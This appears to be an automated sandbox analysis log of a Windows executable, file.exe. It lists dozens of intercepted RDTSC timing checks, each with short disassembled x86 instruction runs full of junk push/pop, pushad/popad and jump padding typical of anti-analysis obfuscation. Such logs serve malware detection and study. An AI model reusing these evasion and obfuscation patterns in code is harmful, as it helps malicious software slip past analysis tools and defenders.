Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC0479 second address: 4AC048A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a movsx edi, si 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC048A second address: 4AC048E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AD0143 second address: 4AD0149 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AD0149 second address: 4AD014D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AD014D second address: 4AD0151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AD0151 second address: 4AD0166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov edi, esi 0x0000000f mov esi, 23425243h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AD0166 second address: 4AD01B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4B9132D69Fh 0x00000009 sub ecx, 10FEB9EEh 0x0000000f jmp 00007F4B9132D6A9h 0x00000014 popfd 0x00000015 mov ah, 29h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F4B9132D6A5h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AD01B8 second address: 4AD01CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6231h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B00B21 second address: 4B00B30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D69Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B00B30 second address: 4B00B48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4B90BE6234h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B00B48 second address: 4B00B7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D69Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e pushad 0x0000000f mov cx, B96Bh 0x00000013 mov edx, esi 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F4B9132D6A4h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B00B7E second address: 4B00B84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B00B84 second address: 4B00B95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4B9132D69Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B00B95 second address: 4B00BD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6231h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c pushad 0x0000000d call 00007F4B90BE622Ch 0x00000012 call 00007F4B90BE6232h 0x00000017 pop eax 0x00000018 pop edx 0x00000019 push esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AE01E5 second address: 4AE0209 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AE0209 second address: 4AE020F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AE020F second address: 4AE0245 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4B9132D6A8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AE0245 second address: 4AE024B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AE024B second address: 4AE027D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D69Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F4B9132D6A0h 0x00000010 mov eax, dword ptr [ebp+08h] 0x00000013 pushad 0x00000014 mov ax, 925Dh 0x00000018 push eax 0x00000019 push edx 0x0000001a mov si, 13FFh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AE027D second address: 4AE0293 instructions: 0x00000000 rdtsc 0x00000002 mov al, F1h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 and dword ptr [eax], 00000000h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4B90BE622Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AE0293 second address: 4AE02A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4B9132D69Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AE02A5 second address: 4AE02A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AE02A9 second address: 4AE02BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax+04h], 00000000h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cx, 9CCFh 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC0579 second address: 4AC057E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC057E second address: 4AC05BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F4B9132D6A6h 0x0000000f mov dword ptr [esp], ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4B9132D6A7h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC05BA second address: 4AC05CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4B90BE622Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC05CE second address: 4AC05E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4B9132D69Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC05E4 second address: 4AC05EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AD0D0C second address: 4AD0D10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AD0D10 second address: 4AD0D42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007F4B90BE6237h 0x0000000b movzx esi, di 0x0000000e pop ebx 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4B90BE622Ch 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AD0D42 second address: 4AD0D81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushfd 0x0000000c jmp 00007F4B9132D6A0h 0x00000011 jmp 00007F4B9132D6A5h 0x00000016 popfd 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AD0D81 second address: 4AD0DA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6230h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4B90BE622Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AD0DA7 second address: 4AD0DAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AD0DAD second address: 4AD0DCC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4B90BE6234h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B0029D second address: 4B002AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D69Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B002AE second address: 4B002B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B002B4 second address: 4B002B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B002B8 second address: 4B002D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6233h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov eax, edi 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B002D9 second address: 4B0032B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b pushad 0x0000000c mov ecx, 37853E11h 0x00000011 popad 0x00000012 mov edi, 2BEC1C50h 0x00000017 popad 0x00000018 push eax 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F4B9132D6A4h 0x00000020 adc ax, B898h 0x00000025 jmp 00007F4B9132D69Bh 0x0000002a popfd 0x0000002b push eax 0x0000002c push edx 0x0000002d mov edx, eax 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B0032B second address: 4B0036C instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4B90BE6232h 0x00000008 or ax, 62F8h 0x0000000d jmp 00007F4B90BE622Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F4B90BE6235h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B0036C second address: 4B003EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [778165FCh] 0x0000000e pushad 0x0000000f jmp 00007F4B9132D69Ch 0x00000014 mov ch, 49h 0x00000016 popad 0x00000017 test eax, eax 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F4B9132D6A3h 0x00000020 sub ecx, 5D44217Eh 0x00000026 jmp 00007F4B9132D6A9h 0x0000002b popfd 0x0000002c mov ah, 0Fh 0x0000002e popad 0x0000002f je 00007F4C03FC0C2Ch 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 mov ecx, 3AFE19DBh 0x0000003d jmp 00007F4B9132D6A0h 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B003EF second address: 4B004B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE622Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, eax 0x0000000b pushad 0x0000000c pushad 0x0000000d mov eax, 2153F86Dh 0x00000012 mov bx, si 0x00000015 popad 0x00000016 popad 0x00000017 xor eax, dword ptr [ebp+08h] 0x0000001a jmp 00007F4B90BE6235h 0x0000001f and ecx, 1Fh 0x00000022 pushad 0x00000023 call 00007F4B90BE622Ch 0x00000028 push ecx 0x00000029 pop edx 0x0000002a pop ecx 0x0000002b mov ch, dh 0x0000002d popad 0x0000002e ror eax, cl 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007F4B90BE6234h 0x00000037 xor al, FFFFFFC8h 0x0000003a jmp 00007F4B90BE622Bh 0x0000003f popfd 0x00000040 mov edx, eax 0x00000042 popad 0x00000043 leave 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 pushfd 0x00000048 jmp 00007F4B90BE6237h 0x0000004d sub ecx, 368571BEh 0x00000053 jmp 00007F4B90BE6239h 0x00000058 popfd 0x00000059 jmp 00007F4B90BE6230h 0x0000005e popad 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B0057B second address: 4B005E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov dx, ax 0x0000000e mov esi, 4396BE2Fh 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F4B9132D6A7h 0x0000001f add esi, 4127716Eh 0x00000025 jmp 00007F4B9132D6A9h 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B005E1 second address: 4B005E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B005E7 second address: 4B005EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0029 second address: 4AB0086 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 5689C926h 0x00000008 mov ebx, 7B3951B2h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebp 0x00000011 pushad 0x00000012 pushad 0x00000013 call 00007F4B90BE6232h 0x00000018 pop ecx 0x00000019 pushfd 0x0000001a jmp 00007F4B90BE622Bh 0x0000001f adc esi, 46EDAC5Eh 0x00000025 jmp 00007F4B90BE6239h 0x0000002a popfd 0x0000002b popad 0x0000002c popad 0x0000002d mov dword ptr [esp], ebp 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0086 second address: 4AB008A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB008A second address: 4AB00A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6232h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB00A0 second address: 4AB00DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 jmp 00007F4B9132D69Dh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 mov bl, al 0x00000013 mov cx, dx 0x00000016 popad 0x00000017 and esp, FFFFFFF8h 0x0000001a pushad 0x0000001b movsx edi, si 0x0000001e movzx ecx, di 0x00000021 popad 0x00000022 push eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F4B9132D69Eh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB00DC second address: 4AB00F0 instructions: 0x00000000 rdtsc 0x00000002 mov dx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 movzx eax, bx 0x0000000a popad 0x0000000b mov dword ptr [esp], ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB00F0 second address: 4AB00F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB00F4 second address: 4AB00FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB00FA second address: 4AB0100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0100 second address: 4AB0104 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0104 second address: 4AB015C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F4B9132D6A0h 0x0000000e mov dword ptr [esp], ebx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F4B9132D69Eh 0x00000018 adc eax, 57856908h 0x0000001e jmp 00007F4B9132D69Bh 0x00000023 popfd 0x00000024 mov bx, ax 0x00000027 popad 0x00000028 mov ebx, dword ptr [ebp+10h] 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F4B9132D6A1h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB015C second address: 4AB0182 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6231h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b mov bh, al 0x0000000d mov ebx, 78521FDCh 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 mov bx, cx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0182 second address: 4AB01B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushfd 0x00000009 jmp 00007F4B9132D6A6h 0x0000000e add si, 6028h 0x00000013 jmp 00007F4B9132D69Bh 0x00000018 popfd 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB01B2 second address: 4AB01EE instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4B90BE6238h 0x00000008 adc eax, 2F7C1288h 0x0000000e jmp 00007F4B90BE622Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, esi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov edi, 224486F6h 0x00000020 mov dl, 1Ch 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB01EE second address: 4AB0214 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0214 second address: 4AB0218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0218 second address: 4AB022B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D69Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB022B second address: 4AB0265 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6239h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4B90BE6238h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0265 second address: 4AB0274 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D69Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0274 second address: 4AB0300 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6239h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ah, bl 0x0000000d pushad 0x0000000e mov dx, cx 0x00000011 movzx esi, bx 0x00000014 popad 0x00000015 popad 0x00000016 xchg eax, edi 0x00000017 jmp 00007F4B90BE622Dh 0x0000001c test esi, esi 0x0000001e pushad 0x0000001f push ecx 0x00000020 jmp 00007F4B90BE6233h 0x00000025 pop esi 0x00000026 pushfd 0x00000027 jmp 00007F4B90BE6239h 0x0000002c xor al, FFFFFF96h 0x0000002f jmp 00007F4B90BE6231h 0x00000034 popfd 0x00000035 popad 0x00000036 je 00007F4C038C4547h 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0300 second address: 4AB0306 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0306 second address: 4AB030C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB030C second address: 4AB0310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0310 second address: 4AB0342 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE622Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4B90BE6237h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0342 second address: 4AB03D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F4C0400B962h 0x0000000f jmp 00007F4B9132D69Eh 0x00000014 mov edx, dword ptr [esi+44h] 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F4B9132D69Eh 0x0000001e jmp 00007F4B9132D6A5h 0x00000023 popfd 0x00000024 movzx ecx, bx 0x00000027 popad 0x00000028 or edx, dword ptr [ebp+0Ch] 0x0000002b jmp 00007F4B9132D6A3h 0x00000030 test edx, 61000000h 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 call 00007F4B9132D6A2h 0x0000003e pop eax 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB03D2 second address: 4AB0411 instructions: 0x00000000 rdtsc 0x00000002 call 00007F4B90BE622Bh 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ecx, edi 0x0000000c popad 0x0000000d jne 00007F4C038C44C9h 0x00000013 pushad 0x00000014 mov si, dx 0x00000017 mov edi, 2E5383E0h 0x0000001c popad 0x0000001d test byte ptr [esi+48h], 00000001h 0x00000021 pushad 0x00000022 call 00007F4B90BE6235h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0411 second address: 4AB045D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007F4B9132D6A7h 0x0000000b and ch, 0000006Eh 0x0000000e jmp 00007F4B9132D6A9h 0x00000013 popfd 0x00000014 popad 0x00000015 jne 00007F4C0400B8EBh 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov si, di 0x00000021 mov di, 6FDAh 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB045D second address: 4AB0463 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0463 second address: 4AB0474 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test bl, 00000007h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0474 second address: 4AB0478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0478 second address: 4AB047C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
